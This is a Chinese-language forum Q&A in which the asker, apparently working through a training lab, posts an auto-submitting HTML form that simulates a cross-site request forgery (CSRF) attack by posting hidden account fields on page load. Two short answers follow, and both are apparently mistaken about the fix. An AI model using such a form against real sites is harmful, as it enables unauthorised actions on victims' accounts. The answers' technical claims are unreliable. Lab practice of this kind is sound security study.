如何使用 HTML 脚本提交参数？

Question

我无法通过模拟 XSRF 攻击的 html 代码向网站提交参数。我在下面的 html 中设置了操作的参数，包括帐户 #、路由 #、操作和需要通过代表用户会话的源代码进行逆向工程的值。

运行时，站点要么返回“Changes Saved”，表示 XSRF 攻击成功，要么返回“XRSF Blocked”，表示我没有正确推导出第四个值。

但是，当我登录到站点并执行脚本时，什么都没有返回，甚至页面形式也没有改变。我认为我的语法中的某些内容可能略有偏差。有人可以帮忙吗？

<!DOCTYPE html>
<html>
<meta charset="UTF-8"/>
<title>XSRF</title>
</head>
<body onload='document.forms[0].submit();'>
<form action='some_php_file.php' method='POST'>
<input type='hidden' name='action' value='save'/>
<input type='hidden' name='account' value='3192332'/>
</form>
</body>
</html>

Answer 1

您的输入没有结束标记。

<input type='hidden' name='action' value='save'
<input type='hidden' name='account' value='3192332'

Answer 2

为了发布信息，您需要一个提交输入：

 <form action='some_php_file.php' method='POST'>
 <input type='hidden' name='action' value='save'/>
 <input type='hidden' name='account' value='3192332'/>
 <input type="submit" name="name" placeholder="placeholder"/>
 </form>

希望这会有所帮助:-)